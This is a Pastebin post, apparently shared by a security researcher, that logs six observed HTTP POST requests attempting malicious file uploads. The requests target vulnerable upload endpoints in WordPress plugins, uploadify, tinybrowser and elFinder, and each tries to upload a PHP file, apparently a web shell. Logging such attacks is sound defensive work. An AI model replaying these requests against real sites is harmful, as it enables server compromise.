Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Malicious File Upload attempts
- *******
- *******
- *******
- POST / HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
- Accept: */*
- Content-Type: multipart/form-data; boundary=(UploadBoundary)
- Host: www.mysite.com
- Content-Length: 340
- Connection: Close
- yiw_contact[]=upfilees.php
- yiw_action=sendemail
- id_form=
- *******
- POST /license.php HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
- Accept: */*
- Content-Type: multipart/form-data; boundary=(UploadBoundary)
- Host: www.mysite.com
- Content-Length: 250
- Connection: Close
- filename=upfilees.php
- 1=
- *******
- POST /wp-admin/admin-ajax.php HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
- Accept: */*
- Content-Type: multipart/form-data; boundary=(UploadBoundary)
- Host: www.mysite.com
- Content-Length: 360
- Connection: Close
- update_file=upfilees.php
- action=revslider_ajax_action
- client_action=
- *******
- POST/uploadify/uploadify.php?folder=/ HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
- Accept: */*
- Content-Type: multipart/form-data; boundary=(UploadBoundary)
- Host: www.mysite.com
- Content-Length: 241
- Connection: Close
- Filedata=upfilees.php
- 1=
- *******
- POST/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass= HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
- Accept: */*
- Content-Type: multipart/form-data; boundary=(UploadBoundary)
- Host: www.mysite.com
- Content-Length: 358
- Connection: Close
- Filedata=upfilees.php.suspected
- Filename=send.php.suspected
- Upload=
- *******
- POST /sites/all/libraries/elfinder/php/connector.minimal.php HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
- Accept: */*
- Content-Type: multipart/form-data; boundary=(UploadBoundary)
- Host: www.mysite.com
- Content-Length: 394
- Connection: Close
- upload[]=upfilees.php
- cmd=upload
- target=l1_Lw
- html=
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment